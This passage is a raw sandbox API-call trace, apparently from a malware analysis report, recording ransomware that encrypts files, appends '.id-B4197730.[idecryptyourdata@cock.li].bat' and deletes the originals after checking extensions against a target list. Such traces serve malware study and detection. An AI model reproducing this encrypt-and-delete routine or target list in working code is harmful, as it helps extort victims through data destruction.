lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=36710) returned 1 [0047.720] CloseHandle (hObject=0x2d4) returned 1 [0047.720] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 0x80 [0047.720] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.720] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.720] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.721] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.721] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0048.134] GetLastError () returned 0x0 [0048.134] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x8f66, lpOverlapped=0x0) returned 1 [0048.136] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x8f70, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x8f70, lpOverlapped=0x0) returned 1 [0048.137] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.137] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xe6, lpOverlapped=0x0) returned 1 [0048.137] SetEndOfFile (hFile=0x334) returned 1 [0048.137] CloseHandle (hObject=0x334) returned 1 [0048.139] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.139] SetEndOfFile (hFile=0x2d4) returned 1 [0048.140] CloseHandle (hObject=0x2d4) returned 1 [0048.140] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.140] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 1 [0048.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.140] lstrlenW (lpString=".doc") returned 4 [0048.140] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.140] lstrlenW (lpString=".docx") returned 5 [0048.140] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0048.140] lstrlenW (lpString=".pdf") returned 4 [0048.140] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.140] lstrlenW (lpString=".xls") returned 4 [0048.140] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString=".xlsx") returned 5 [0048.141] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0048.141] lstrlenW (lpString=".ppt") returned 4 [0048.141] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString=".zip") returned 4 [0048.141] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString=".rar") returned 4 [0048.141] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString=".bz2") returned 4 [0048.141] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.141] lstrlenW (lpString=".7z") returned 3 [0048.141] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString=".dbf") returned 4 [0048.141] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString=".1cd") returned 4 [0048.141] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString=".jpg") returned 4 [0048.141] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.141] lstrlenW (lpString=".doc") returned 4 [0048.141] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.141] lstrlenW (lpString=".docx") returned 5 [0048.141] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0048.141] lstrlenW (lpString=".pdf") returned 4 [0048.141] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString=".xls") returned 4 [0048.141] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.141] lstrlenW (lpString=".xlsx") returned 5 [0048.142] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0048.142] lstrlenW (lpString=".ppt") returned 4 [0048.142] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.142] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.142] lstrlenW (lpString=".zip") returned 4 [0048.142] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.142] lstrlenW (lpString=".rar") returned 4 [0048.142] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.142] lstrlenW (lpString=".bz2") returned 4 [0048.142] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.142] lstrlenW (lpString=".7z") returned 3 [0048.142] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.142] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.142] lstrlenW (lpString=".dbf") returned 4 [0048.142] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.142] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.142] lstrlenW (lpString=".1cd") returned 4 [0048.142] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.142] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0048.142] lstrlenW (lpString=".jpg") returned 4 [0048.142] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.142] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0048.142] lstrlenW (lpString="warn.ico") returned 8 [0048.142] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0048.142] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=10134) returned 1 [0048.143] CloseHandle (hObject=0x2d4) returned 1 [0048.143] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 0x80 [0048.143] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.143] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0048.143] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.143] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.143] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0048.143] GetLastError () returned 0x0 [0048.143] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x2796, lpOverlapped=0x0) returned 1 [0048.191] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x27a0, lpOverlapped=0x0) returned 1 [0048.192] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.192] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0048.192] SetEndOfFile (hFile=0x334) returned 1 [0048.193] CloseHandle (hObject=0x334) returned 1 [0048.193] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.193] SetEndOfFile (hFile=0x2d4) returned 1 [0048.194] CloseHandle (hObject=0x2d4) returned 1 [0048.194] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.195] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 1 [0048.195] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.195] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.195] lstrlenW (lpString=".doc") returned 4 [0048.195] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.195] lstrlenW (lpString=".docx") returned 5 [0048.195] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0048.195] lstrlenW (lpString=".pdf") returned 4 [0048.195] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.195] lstrlenW (lpString=".xls") returned 4 [0048.195] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.195] lstrlenW (lpString=".xlsx") returned 5 [0048.195] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0048.195] lstrlenW (lpString=".ppt") returned 4 [0048.195] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.195] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString=".zip") returned 4 [0048.196] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.196] lstrlenW (lpString=".rar") returned 4 [0048.196] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.196] lstrlenW (lpString=".bz2") returned 4 [0048.196] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.196] lstrlenW (lpString=".7z") returned 3 [0048.196] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString=".dbf") returned 4 [0048.196] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString=".1cd") returned 4 [0048.196] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString=".jpg") returned 4 [0048.196] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.196] lstrlenW (lpString=".doc") returned 4 [0048.196] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.196] lstrlenW (lpString=".docx") returned 5 [0048.196] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0048.196] lstrlenW (lpString=".pdf") returned 4 [0048.196] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.196] lstrlenW (lpString=".xls") returned 4 [0048.196] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.196] lstrlenW (lpString=".xlsx") returned 5 [0048.196] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0048.197] lstrlenW (lpString=".ppt") returned 4 [0048.197] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.197] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.197] lstrlenW (lpString=".zip") returned 4 [0048.197] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.197] lstrlenW (lpString=".rar") returned 4 [0048.197] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.197] lstrlenW (lpString=".bz2") returned 4 [0048.197] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.197] lstrlenW (lpString=".7z") returned 3 [0048.197] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.197] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.197] lstrlenW (lpString=".dbf") returned 4 [0048.197] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.197] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.197] lstrlenW (lpString=".1cd") returned 4 [0048.197] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.197] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0048.197] lstrlenW (lpString=".jpg") returned 4 [0048.197] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.197] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0048.197] lstrlenW (lpString="netfx_Core_x86.msi") returned 18 [0048.197] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0048.198] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=1163264) returned 1 [0048.198] CloseHandle (hObject=0x2d4) returned 1 [0048.198] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 0x80 [0048.199] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.199] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0048.199] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.199] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.199] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0048.199] GetLastError () returned 0x0 [0048.199] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0049.534] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0049.549] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x1c010, lpOverlapped=0x0) returned 1 [0049.859] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x1c020, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x1c020, lpOverlapped=0x0) returned 1 [0049.863] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0049.863] WriteFile (in: hFile=0x334, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0049.863] SetEndOfFile (hFile=0x334) returned 1 [0049.863] CloseHandle (hObject=0x334) returned 1 [0049.882] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.882] SetEndOfFile (hFile=0x2d4) returned 1 [0049.884] CloseHandle (hObject=0x2d4) returned 1 [0049.884] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.885] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 1 [0049.885] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.885] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.885] lstrlenW (lpString=".doc") returned 4 [0049.885] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0049.885] lstrlenW (lpString=".docx") returned 5 [0049.885] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0049.885] lstrlenW (lpString=".pdf") returned 4 [0049.885] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0049.885] lstrlenW (lpString=".xls") returned 4 [0049.885] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0049.885] lstrlenW (lpString=".xlsx") returned 5 [0049.885] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0049.885] lstrlenW (lpString=".ppt") returned 4 [0049.885] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0049.885] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.885] lstrlenW (lpString=".zip") returned 4 [0049.885] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0049.885] lstrlenW (lpString=".rar") returned 4 [0049.885] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0049.885] lstrlenW (lpString=".bz2") returned 4 [0049.885] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0049.885] lstrlenW (lpString=".7z") returned 3 [0049.885] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0049.885] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.885] lstrlenW (lpString=".dbf") returned 4 [0049.885] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".1cd") returned 4 [0049.886] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".jpg") returned 4 [0049.886] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".doc") returned 4 [0049.886] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString=".docx") returned 5 [0049.886] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0049.886] lstrlenW (lpString=".pdf") returned 4 [0049.886] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0049.886] lstrlenW (lpString=".xls") returned 4 [0049.886] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0049.886] lstrlenW (lpString=".xlsx") returned 5 [0049.886] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0049.886] lstrlenW (lpString=".ppt") returned 4 [0049.886] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".zip") returned 4 [0049.886] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0049.886] lstrlenW (lpString=".rar") returned 4 [0049.886] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0049.886] lstrlenW (lpString=".bz2") returned 4 [0049.886] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString=".7z") returned 3 [0049.886] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".dbf") returned 4 [0049.886] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".1cd") returned 4 [0049.886] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0049.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0049.886] lstrlenW (lpString=".jpg") returned 4 [0049.887] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0049.887] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0049.887] lstrlenW (lpString="netfx_Extended_x64.msi") returned 22 [0049.887] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0055.391] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=872448) returned 1 [0055.391] CloseHandle (hObject=0x324) returned 1 [0055.391] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 0x80 [0055.391] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.391] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0055.391] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.391] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.391] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0055.391] GetLastError () returned 0x0 [0055.392] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0xd5000, lpOverlapped=0x0) returned 1 [0055.468] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, 